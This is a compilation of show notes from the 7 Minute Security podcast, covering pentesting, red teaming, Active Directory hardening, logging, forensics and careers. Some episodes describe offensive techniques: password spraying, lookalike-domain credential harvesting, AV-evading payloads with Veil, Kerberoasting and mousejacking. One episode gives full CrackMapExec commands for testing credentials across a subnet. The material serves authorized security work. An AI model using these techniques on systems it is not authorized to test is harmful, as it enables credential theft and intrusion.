begrudgingly because of requirements/regulations?

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8. This episode features cool things I'm learning about external pentesting. But first, some updates: My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink. The 7MS User Group went well. We'll resume in the late summer or early fall and do a session on lockpicking! Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow, what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful. On the external pentest front, here are some items we cover in today's show: MailSniper's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds! Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax: crackmapexec smb 192.168.0.0/24 -u USER -p ‘PASSWORD’ -d YOURDOMAIN You can also find what shares you have access to with: crackmapexec smb 192.168.0.0/24 -u USER -p ‘PASSWORD’ -d YOURDOMAIN --shares Sift through those shares! They often have VERY delicious bits of information in them :-)

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! Yuss! It's true! Dave and Ryan are back! Back in episode #326 we met Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup and talked about their cool and exciting careers as professional red teamers. In this follow-up interview (which will be broken into a few parts), we talk through a red team engagement from start to finish. Today we cover questions like: Who should have a red team exercise conducted? Who NEEDS one? How do you choose an objective that makes sense? What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude! What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients? How do you attack a high-security bunker?! How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! Today I take a walk (literally!), get chased by a dog (seriously!) and talk about impostor syndrome and feelings of self-loathing and doubt as I get ready to speak at Secure360 next week (insert wah-wah-waaaaaaahhhhhhh here). How do you deal with impostor syndrome? Personally, I'm finding some success in squashing it by forcing myself into situations where I feel like a fraud - over and over again! Over time, I feel slightly less like a sham and a bit more like I know what I'm talking about. Specifically, in this episode I talk about: The thrill of getting a presentation accepted at a conference, and the dread and fear that follows The awful nightmare I have the night before I speak in front of others Shaking off nerves when your talk is accompanied by a sign language interpreter Finding your "voice" and getting the confidence to share/present your knowledge in a way only you can I also share the outline to my "So You Wanna Start a Security Company?" talk, which includes: What are the telltale signs that you should start a security company? How do you find business when everybody and their mom seems to have a security offering? What are some of the tools/services/people that can help your business succeed?

Today we're talking about Logging Made Easy, a project that, as its name implies...makes Windows endpoint logging easy! I love it. It offers a simple, digestible walkthrough of several short "chapters" to get started. These chapters include: Chapter 1 - Set up Windows Event Forwarding Chapter 2 – Sysmon Install Chapter 3A – Database (Easy Method) Chapter 3B – Database (Manual Method) Chapter 4 - Post Install Actions Besides having a small issue with a batch script (resolved as of 5/3) and a another snafu (that's probably my fault), it's a simple and effective way to get logging spun up in your environment!

This episode of the 7 Minute Security podcast is brought to you by Netwrix. Netwrix Auditor empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime. For more information, visit netwrix.com. In today's program we continue a series on fundamental Active Directory security that we started back in episode 327. I took all the things I talked about in that episode, as well as the new additions discussed today: Finding your most vulnerable AD abuse paths with BloodHound. For a two-part pentest tale showing how BloodHound can be used/abused by attackers, check out episodes 353 and 354. Get a deep-dive look at your AD machines, users, shares, OS versions and more with Network Detective. How to de-escalate local admins (and prevent them from over-using/abusing the use of their privileged account) Although I haven't tested it yet, Logging Made Easy looks like an awesome and free way to get some entry-level logging setup in your environment. Can't wait for a good lab day to play! Here are ALL the AD Security 101 tips in a delicious [gist].

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! In this episode I explore some ways you can turn up the security heat on your Windows workstations by mapping their security to a hardening standard and/or baseline. Specifically, I cover: NIST STIG for Windows 10 Heimdal Security - Windows 10 Hardening Guide Center for Internet Security's security benchmarks Windows Security Compliance Toolkit (SCT) I think one path to success is to use the Windows SCT as a way to create a baseline, and then use it - plus some of the other guides and standards - to gradually turn the security screws on the OS. Don't just import a GPO template and turn on 123,456,789 settings at once. You'll likely bring the network to its knees! Got a better/faster/stronger way to accomplish baselining? Let me know!

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! This week we're talking about everybody's favorite topic: REPORT WRITING! Yay! The peasants rejoice! In the last few months I've seen a lot of reports from other companies, and here are a few key problems I see with them: Too long - overall these things are waaAAaAaaAayyyYYYYYYyyy too long. I see reports where the analyst has copied and pasted an entire Nessus report into the main report. Yikes. That makes these things weigh in at hundreds(!) of pages. Too techie - these reports look like their written from one techie to another. Nothing wrong with that, really, however in many cases the key person that needs to "get it" is a manager or C-level position who needs to understand the risks in plain English. No narrative - the reports are just a long laundry list of vulnerabilities without any context of how the pentest was conducted or which vulns should be fixed first. Weak remediation - most of the findings are accompanied by whatever remediation instructions are provided by the vuln-scanner or other tool. We can do better than this! How? Listen to today's episode :-). Oh, and don't forget to come to the next 7MS User Group meeting on Monday, April 22! Details here!

Today I'm launching an ongoing series called 7MOIST. It stands for: 7 Minutes of IT and Security Tips The wildest, craziest, nuttiest part of this series is that each episode will be 7 minutes long! I know, I know! You're saying, "Wait a sec, bub, isn't that why this podcast is called 7 Minute Security in the first place?" And yes, you'd be right. Basically, this is my way of going old school and getting back my podcast "roots" by delivering an episode before we had an intro jingle, interviews, sponsors, banter about hot cocoas or an outro song. Nothing but delicious content today friends, Enjoy! Today's theme is: Windows command line shortcuts and tips: Creative ways to play with cmd Basically, you can do Windows Key + R then type cmd and Enter for quick access to command line. But lets do some more fun stuff. Wanna open a command window from the desktop and launch a command in one swoop? Try this: cmd /k For example: cmd /k ping 192.168.0.1 The cmd /k part opens a command window, and then ping 192.168.0.1 can be whatever command you also want to run on the fly. And if you want to start programs and/or open files right from the command line, you can do that (in most cases) by just typing the program name, like: notepad Or, get really fancy and add a document name after the command. For example: notepad meow.txt If meow.txt doesn't exist, Notepad will simply ask you to create it! Finding files faster Call me crazy, but the Windows find/search feature sometimes doesn't find stuff that I know is there. So I still like using old school DOS commands for this. I might do something like: cd \ dir /s *brian*.doc The dir stands for directory, and the /s tells the system to search recursively. See 7ms.us for the rest of today's show notes!

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! In today's episode I talk about some cool tools you can use to start a hard drive forensics investigation more quickly. Resources talked about on today's podcast include: Forensics 101 - a talk I did for the 7MS user group in January The Digital Forensics Survival Podcast is a FANTASTIC resource to learn more about forensics CyLR works great to do quick live disk artifact-gathering on a suspect system, and then... CDQR can step in and analyze the info you gathered with CyLR and spit out helpful reports to begin your investigation YouTube video of the CyLR/CDQR creators demonstrating the tools and doing a live demo of artifact collection/analysis Did you miss this week's mousejacking Webinar? Also, DIY $500 Pentest Lab - Part 2 is up on YouTube. And we've got a fun Webinar on MITRE ATT&CK coming up in May. Sign up here

This episode is brought to you by Netwrix Auditor, which empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime. In this episode, we talk about the Mousejacking attack, which allows someone with a crazy radio (or other similar device) to inject keystrokes into vulnerable keyboards and mice. Yikes! Not trying to be a doom and gloom guy here, but using this Mousejacking attack, pentesters/attackers could take over your entire Active Directory in just seconds - from the parking lot! I'll talk about how exactly that could be done - as well as ways to defend against mousejacking - in today's episode. If this episodes primes your appetite for more Mousejackin' fun, join me and my pals Paul and Dan for a deep-dive Mousejacking Webinar on Tuesday, April 2 at 12 p.m. CST! Some resources talked about in today's episode: Mousejack.com - great demo video of the attack Crazy Radio PA - one hardware option to perform mousejacking attacks Custom mousejacking firmware for Crazy Radio PA Jackit - tool for conducting mousejack attacks A cool Twitter thread on using mousejacking for pentests Vulnerable devices - nice repository of devices known to be susceptible to mousejacking attacks

Today's episode is the thrilling, exciting, heart-pounding conclusion of Tales of Internal Pentest Pwnage - Part 1. In this episode, we cover the final "wins" that got me to Domain Admin status (and beyond!): Got DA but can't get to your final "crown jewels" destinations? How about going after the organization's backups (evil grin!) Got DA but stuck to find hot leads to where the crown jewels are? Get snoopy and go through people's files, folders and...bookmark caches! (evil grin #2!) If your nmap/eyewitness scan turns up Web sites with simply an IIS default landing page or "It works!" Apache page on it, there's probably more there than meets the eye. We also talk about lessons learned from this pentest - both things done well and things the org can do to make the next pentester's job a lot harder.

Buckle up! This is one of my favorite episodes. Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative to share. Below are some highlights of topics/tools/techniques discussed: Building a pentest dropbox The timing is perfect - my pal Paul (from Project7) and Dan (from PlexTrac) have a two-part Webinar series on building your own $500 DIY Pentest Lab, but the skills learned in the Webinars translate perfectly into making a pentest dropbox. Head to our webinars page for more info. Securing a pentest dropbox What I did with my Intel NUC pentest dropbox is build a few VMs as follows: Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it. Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS). Scoping/approaching a pentest From what I can gather, there are (at least) two popular schools of thought as it relates to approaching a pentest: From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there. Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point. Pentest narrative For one of the tests I worked on, here were some successes and challenges I had along the way: Check out the show notes at 7MS.us as there's lots more good info there!

I recently had the awesome opportunity to take the awesome Real World Red Team course put on by Peter Kim, author of The Hacker Playbook series. TLDR and TLDR (too long don't listen): go take this training. Please. Now. The end. If you want to hear more, check out today's podcast episode where I talk about all the wonderful tidbits I learned from Peter during the training, including: Doppelganger attacks - does your target have a frequently used site like mail.company.com? Try buying up mailcompany.com with a copy of their email portal (using Social Engineer Toolkit), and the creds might come pouring in! Get potential usable creds from old breaches (Adobe, Ashley Madison, LinkedIn, Spotify) Password spraying is often really effective to get you your first set of creds - check out Spray or DomainPasswordSpray When creating phishing payloads, Veil will help you craft something to bypass AV When you're in a network and have grabbed your first set of creds, run BloodHound or SharpHound to map the Active Directory and find your high-value targets Check systems for MS17-010 for some potential easy wins Look for potential accounts that you can Kerberoast For more info visit today's show notes on 7ms.us

Today's episode is brought to you by NoteCast. Try it free for 60 days (no credit card required) and enter code 7MS when completing your signup. In today's episode, I talk about how the level of Windows server/client logging out of the box is...not really awesome. I then look at how we can create a GPO that turns logging "up to 11" using some free tools and cheat sheets. If you want to simulate this in your own lab by building out an Active Directory environment, check out part 1 of a Webinar series we've been working on called DIY $500 Pentest Lab, which helps you select hardware/software components you need to build a lab. Then coming up soon is part 2 where we'll build out a Windows 2012 server, promote it to a DC, join a couple clients to it, and prepare to start hacking! Once your AD and clients are setup, you can start slurping up their logs for free using a Papertrailapp account (not a sponsor). I went ahead and paid for a $7/mo plan so I could get 1GB of storage and a little longer log retention. Then, I used LOG-MD to audit a Windows workstation and get some great recommendations on what registry settings and security policy tweaks to make. Finally, I started turning this into a GPO so I could begin pushing out these settings en masse. My living/breathing document to capture all this information is in a new gist that I plopped here.

Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance. Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk a lot about a topic I'm fascinated with: incident response! I had a slew of questions and topics I wanted to discuss, including: Fundamentals of threat hunting What is threat hunting? What are the fundamentals to start mastering? How can someone start developing the core skills to get good at it? How can sysadmins/network admin, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties? What training/cert options are good to build skills in threat hunting? Lets say you know one of your users has clicked something icky and you suspect compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage? Are attackers on networks typically wiping logs on systems as the bounce around laterally? Anything to add to the low-hanging hacker fruit list? Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation? When does it make sense to outsource some security responsibilities to a third party? Learn more about Pondurance at their Web site and Twitter.

Today's featured interview is with Ameesh Divatia, cofounder and CEO at Baffle. Baffle offers an interesting approach to data protection that they call data-centric protection, and the idea is you need to protect information at the record level, not just the sort of traditional approach of "encrypt at rest" and call it good. Ameesh sat down with me to talk about a lot of high level data and security privacy concerns, specifically: Data privacy - it seems like every 15 minutes there's yet another massive data breach. Why is this continuing to happen? What are the basic security/privacy fundamentals that companies should be doing but, for whatever reason, are not? GDPR What does GDPR mean to the average person? Why it was a data privacy wake-up call for so many? Have there been any sizable fines issued thus far? How can data that companies collect on us be processed in a way that doesn't compromise security? Learn more about Baffle at their Web site and Twitter.

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode focuses on security for families/kids - specifically cell phone security for tweenagers. We hit a milestone in the 7MS household this year because my tweenage son got an iPhone, much to my...uhh...not excitement. So we decided to wrap the following technical and administrative controls around the phone to hopefully make it a pleasant experience for everybody: Technical I really dig the Apple family sharing controls, which let you do things like: Have the phone "sleep" at certain hours Limit the total amount of screen time per day Require you to authorize any apps that are downloaded We turned on OpenDNS to help filter inappropriate content. I also use UniFi access points, which allow you to create a separate wireless SSID with a voucher system enabled on it. That way, you can hand out vouchers to kids with a defined amount of access attached to it (like 1 hour or whatever you like). We use it as a reward once the kids' chores and homework is complete. Administrative For our tweenager with the phone, we wrote up an agreement about acceptable use of the phone - including guidelines around the device's physical security, passwords and PINs, appropriate content, etc. You can grab a copy here

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Psst...my pals Paul and Dan are hosting a Webinar all about building your own pentest lab for ~$500. This is happening next Tuesday, Feb. 5 at 12 p.m. CST. Sign up here. Today I thought I'd kind of hit the reset/refresh button and give you a little background on: My self-diagnosed job ADHD (check out my series on career guidance for the even longer version :-/) The history of 7MS the podcast (inspired by 10 minute podcast) How the podcast helped launch 7MS the business The various resources 7MS has worked on to help you in your IT/security career, such as: BPATTY - Brian's Pentesting and Technical Tips for You A Slack channel full of cool security people who want to help you learn, and learn from others as well Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy Thinking about starting your own company? Come see me at Secure360 this summer for my talk called So You Want to Start a Security Company.

WARNING: Today's episode is a bit of an experiment, and I hope you'll hang in there with me for it. I had the opportunity to do a week-long red team engagement, and so I recorded a little summary of the experience at the end of each day, and then pasted them all together to make today's episode. Listening back to the episode now, it sounds like I might belong on a funny farm. But I thought it would be fun to give you a first-hand account of the experience so you can share the stomach-twisting journey with me.

Coming up on Tuesday, January 22 I'll be doing a Webinar with Netwrix called 4 Ways Your Organization Can Be Hacked. It features a Billy Madison theme and pits evil Eric Gordon against sysadmin Billy Madison. Hope you'll join us - it'll be fun! Today I'm pleased to welcome Amber Boone to the program! She is an awareness builder for a cybersecurity vendor (insert dramatic music!), and Amber was gracious enough to help me pilot a new style of interview called 7 Minute Interviews with 7MS. I basically asked Amber a "serious" question about security, then a goofy one, then another serious, then another goofy...and so on and so forth until the 7 minutes was up. Amber answered important questions such as: Would she rather fight 100 duck-sized horses, or 1 horse-sized ducks? What basic security effort could orgs address without investing a huge amount of dollars and effort? Would she rather be a giant hamster or a tiny rhinoceros? If you'd like to check out what Amber's doing online, check out her LinkedIn, her side project YourLegacies.com or follow Amber on Twitter. Interested in doing a 7 minute interview with 7MS? Head here.

I'd like to coordially invite you to the first-ever 7MS User Group meeting, coming up Monday, January 14th at 6 p.m.! You can attend physically, virtually or both! All the info you need is in today's podcast, as well as here. See you there!

Psssst! Wanna come to the first ever 7MS User Group meeting? It's coming up on January 14th. You can join in person or virtually! Head here for more information! Dan DeCloss (a.k.a. wh33lhouse on Slack and @PlexTracFTW aon Twitter) joined me virtually in the studio to talk about his passion project, PlexTrac. Dan also shared his insight on all sorts of great topics, including: How to bleed "purple" and get comfortable playing on both the attacking and defending side of the house What areas are we failing in defending our networks - and what kind of things can we do make our networks more resilient?! What's the biggest challenge you see on both the blue and red team side (spoiler alert: communication is super important!)? How do you break into a cyber security position that requires X years of experience when you have zero experience (Dan offers a great tip: don't be intimidated by requirements on job postings...they're often excessive/unreasonable) Ways to show security aptitude on your resume without necessarily having a bunch of experience: Build a home lab Create a blog Bug bounties Make a podcast Get certs (or at least get enrolled in them) Some history on PlexTrac and what inspired Dan to create it

Matt McCullough (a.k.a. Matty McFly on Slack) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career opportunities, Matt now rocks a SOC job. Matt and I sat down to talk about a lot of good stuff: How to start an IT career as "the family IT guy" Leveraging a higher education (at places like Lake Superior College to meet people of influence and start networking like a beast Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily into the security realm. If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle! Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop Attend security conferences(or start your own)! ...more notes at 7MS.us!

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In today's episode we talk about how to identify - and resolve - unquoted service paths. Maybe you've seen this pop up in your vulnerability scanner and aren't quite sure what the risk is or how to fix it - and maybe more importantly, how to fix it at scale if need be. That's the technical conundrum I faced this week, so I talk about some resources to help you identify this risk and get it out of your environment! And here's a gist I wrote that walks you through everything step by step:

Last week I had the fun privilege of speaking twice at the Minnesota Goverment IT Symposium on the following topics: Forensics 101: This was a "reloaded" talk that I started earlier this year (and covered in episode 299 and 300). At a high level, the talk covered: Hunting malware with Sysinternals Creating system images with FTKImager Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch article Seeking out DNS tunneling/exfil using Security Onion Pecha Kucha: this talk, which is in a 20x20 format is part PSA about how to not click bad links, part cautionary tale (and music video!) about how the promise of a free burrito can ruin your business! Check out the video here, and special thanks to Joe Klein for providing the awesome pics to go along with the storyboard - you're a champ. Also, check out the Digital Forensics Survival Podcast which is awesome for learning more about forensics and IR.

On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but in retrospect it was an amazing experience. This is the mission I was given: See if you can get the front desk staff to plug in a USB drive - I posed as John Strand and armed myself with a fake resume. And as I approached the front desk I suddenly panicked and thought, "What if the front desk person is a BHIS fan?!?!?" Break into a door with weak security and steal equipment - I was given a plastic shiv and asked to try and get into a secure area in the middle of a busy office morning. No pressure, right? Was I successful? Was I arrested? Find out in today's episode!

Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!). And if you're just now starting to shop around for a SIEM, this episode also has an extensive questionnaire you can use to put your vendors' feet to the fire and see what they're made of! Along with today's episode, I'm releasing a companion gist that contains: Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts Enjoy!

Happy Thanksgiving! In this episode I: Share some things I'm thankful for - like you! Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I did there? So clever) Announce the 7MS user's group that will start meeting in the south metro area of Minnesota in January of 2019! Tell you a story about a kid that peed his pants in front of me (you're welcome in advance) Hope you can take some time off and enjoy your friends/family this week and weekend. Have a blessed Thanksgiving!

Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to run 7 Minute Security, LLC in hopes it might help you run your company as well! I started a new gist to complement this episode, which you can get by clicking here. Enjoy!

Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham house rule I'm just going to talk about a few things from a general, high level. Specifically, I asked several heavy-hitting red teams these burning questions: When you red team an org, do you usually assume compromise (i.e. plug a Kali box into the network and go from there) or are you crafting email payloads from scratch, trying to get a reverse shell past various email/firewall filtering efforts? Does your management seem to "get it" when it comes to the true value of having a red team? Or do they put limits on your efforts - like "Wait a sec, don't phish my boss!" Or "OMG hold on, don't pwn those systems!"

This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a Budget talk I've been doing the past year or so, and essentially focuses on things organizations can do to better defend their networks without draining their budgets. The presentation had a Child's Play theme and showed Chucky trying to hack Andy's company via: Phishing Abusing bad domain passwords Abusing bad local admin passwords Responder attack Lack of SMB signing Each attack was also followed up my some advice for how to stop it (or at least slow down its effectiveness). The presentation itself was a blast and I learned some good public speaking lessons as a result: Get your slides done early! - when co-presenting, it makes sense that they want to see your slides sooner than the day of! :-) Don't freak out about an audience of "none" - I always think Webinars are weird because you can't see people's faces or interpret their body language to get a feel for whether they appreciate your humor or understand the points you're trying to make. I learned you just gotta keep pushing forward "blind" whether you like it or not. Setup a redundant presentation system - ok so file this one with the irrational fears dept, but I actually had a second laptop ready with my presentation loaded, and the laptop was connected to a cell hotspot I setup on a tablet. That way if my machine BSOD'd or Internet went out in my house, I could quickly rejoin the presentation and pick up where I left off. Safe or psycho? You decide! Happy belated Halloween!

This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips I share in today's episode: The Badger Infosec group did a cool Rubber Ducky demo. Dan from DDSec did a demo of PlexTrac which is "the last cybersecurity reporting tool you will ever need." I'm actually going to use PlexTrac for my next few assessments and am working to line up a future interview with Dan to learn even more. Paul gave a demo of Parrot which is cool and Kali-like. However, when Paul and I did a side-by-side test with Kali, we noticed that Parrot kind of barfed when it set out to do an Eyewitness report. After meeting Paul's son, Simon, I'm optimistic about the future IT/security leaders in this country. There are some wicked-smart youth out there! Paul gave me a hotel keycard lockpick/shiv (his own creation!) and staged a few doors for me to try and bypass. He made it interesting when he promised to throat-punch me if I failed! Thankfully, I got off without any throat punches!

In this episode I'm releasing a new document aimed to help organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things to implement. And my hope is it can be a living/breathing document that will bulk up over time. Got things to add to this list? Then please comment on the gist below!

It's done! It's done!! It's DONE!!! That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done! In today's episode I: Recap the course authoring experience Explain my super anal retentive editing process that takes 4 hours for every 10 minutes of produced video Admit some last minute mistakes that about made me quit the whole project With the holidays coming up, this course is a perfect gift for that IT or security person in your life :-). Buy them a copy - or 10! Psst! I will soon be getting a handful of vouchers to the course that I can give away to podcast listeners. Interested in one? Ping me and I'll draw names from a virtual hat in a few weeks!

In today's episode, I'm excited to be joined in the studio by Nathan Hunstad, Director of Security at Code42. Nathan and I had a great chat about Code42's new security offering called Code42 Forensic File Search, which helps IT and security teams figure out where files are located across their enterprise - even if the endpoints are offline. This functionality lends itself to a number of interesting use cases and helps answer questions such as: "Does known malware have, or has it ever had, a foothold in our environment?" "Has a particular crypto-mining agent been installed on our employees’ computers? Who has it now?" "What endpoints have or had copies of our company’s most sensitive files?" "What files did an employee download or delete in the months before resigning?" "What non-sanctioned collaboration applications are present in our environment?" After today's podcast, be sure to check out this great video of Nathan demonstrating the power of Code42 Forensic File Search live! Also talked about in today's episode: Implementing host-based firewalls - here's a great blog and video on it I want to thank Code42 for their support of the 7 Minute Security podcast. It's a pleasure to work together with them to help companies be more secure!

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com Welcome! Today I'm kicking off a new miniseries all about the fundamentals of Active Directory security. Rather than try to pile all the info into show notes, I'm going to start pumping everything into a living/breathing GitHub gist so we're all on the same page as this miniseries develops further. So, please feel free to check out that gist here.

This episode is a cavalcade of fun! Why? First, I've got a big announcement: I've accepted a new position. "What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?" No worries, it's business as usual, and my responsibilities at 7MS aren't changing. But I'm also going to start writing blogs, nurturing a Slack channel and producing a podcast for somebody else each week. Tune in to find out who! Oh, and I also conclude this episode with a song from my band, Sweet Surrender. A few years ago we wrote a goofy song to start our shows called Sound Check, and in this episode, I wanted to debut the sequel to that song...called MANDATORY ENCORE. Enjoy.

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com Well I'm geeking out big time because today I chatted with John Strand of Black Hills Information Security, SANS instructing, Security Weekly, Active Countermeasures, RITA and more. Some people think he looks like Wash from Serenity or Steve the Pirate from Dodgeball, and others get upset when they learn he's not John Strand the male model. I've followed John and his team's work since I got started in security, and they've been a huge inspiration for what I do at 7MS. If you're not watching the BHIS Webcasts stop what you're doing and subscribe now! They're all full of practical, hands-on security advice - often complemented by tools that are totally free! Anyway, enjoy today's interview where John and I talk about how to make pentesters' jobs harder, and why he'd rather be a security advisor to Katy Perry than Donald Trump.

Today's episode is brought to you by my friends at Dashlane, a fantastic password manager for you, your family and your business! Head to www.dashlane.com/7ms and use the code 7MS for 10% off a year of Dashlane Premium! Today I'm super pumped to be joined by Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup. Both these guys lead red teams for a living and had a lot of great insight to share as it relates to: The definition of "red teaming" and where it overlaps, if at all, with pentesting Successfully running red team campaigns Defending against a red team campaign How to climb unclimbable walls Is antivirus any good at stopping attackers? The importance of 2FA and training your end-users How to fool the "This email originated outside your organization" email banners How to break into red teaming as a career How to successfully break into a casino (or not) Other links and things mentioned in today's show: RedTeam Security's awesome YouTube video on breaking into the US power grid If you're a red teamer and in the Twin Cities area (or willing to drive a bit), you definitely want to sign up for ArcticCon coming up on October 23-24 at the Optum World Headquarters. Head to the link and sign up - if there are seats left! Once you listen to today's episode, please let me know if you'd like Ryan and Dave to come back for another interview. We were thinking it would be a blast to talk about the details of planning a red team engagement!

Today's episode is a follow-up to #304 where we talked about how you can integrate over 500 million weak/breached/leaked passwords form Troy Hunt's Pwned Passwords into your Active Directory. To get started with this in your environment, grab Troy's updated passwords list here, and then you can check out my BPATTY site for step-by-step implementation instructions. The big "gotchas" I discuss in today's episode are: If users update their password to something on the Pwned Passwords list, they'll see the generic "Your password didn't meet policy requirements" message. In other words, the message they'll see is no different than when they pick a password that doesn't meet the default domain policy. So be careful! I'd recommend training the users ahead of pulling the trigger on Pwned Passwords. If you want to take, for example, just the top 100 words off of Troy's list and start your implementation off with a small list with: Get-Content ".\pwnedpasswords.txt" | select -First 100 As it relates to "hard coding" a machine to point to a specific domain controller, this site has the technique I used. Is there a better way?

It's been a while so I thought I'd update you on how things are going on the business front. Here are the big updates I want to share with you in today's episode: A new 7MS hire that's going to hunt sales opportunities! My approach to finding podcast sponsors (it seems to be working) Some kick-butt interviews that are on the horizon (including the one and only JOHN STRAND!) Lots of goodies to share today!

I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far: Passwords 2FA/MFA Wifi (put a good password on it, don't use WEP, don't use WPS Sign up for HaveIBeenPwned Update all the things Block malware/mining with browser plugins Security awareness training What do you think? Anything I missed or should consider swapping with another topic? Contact me!

I had an exhilarating and terrifying experience this week doing my first ever live radio interview! As a quick bit of background, this interview was part of the 7MS radio marketing campaign that I've talked about my "How to Succeed in Business Without Really Crying" series (here's part 1, 2 and 3). The interview was conducted by Lee Michaels, and though my heart was pounding for the first few minutes, it quickly became fun as Lee and I talked about picking good passwords, securing wifi, talking to your kids about safe online behaviors, and more.

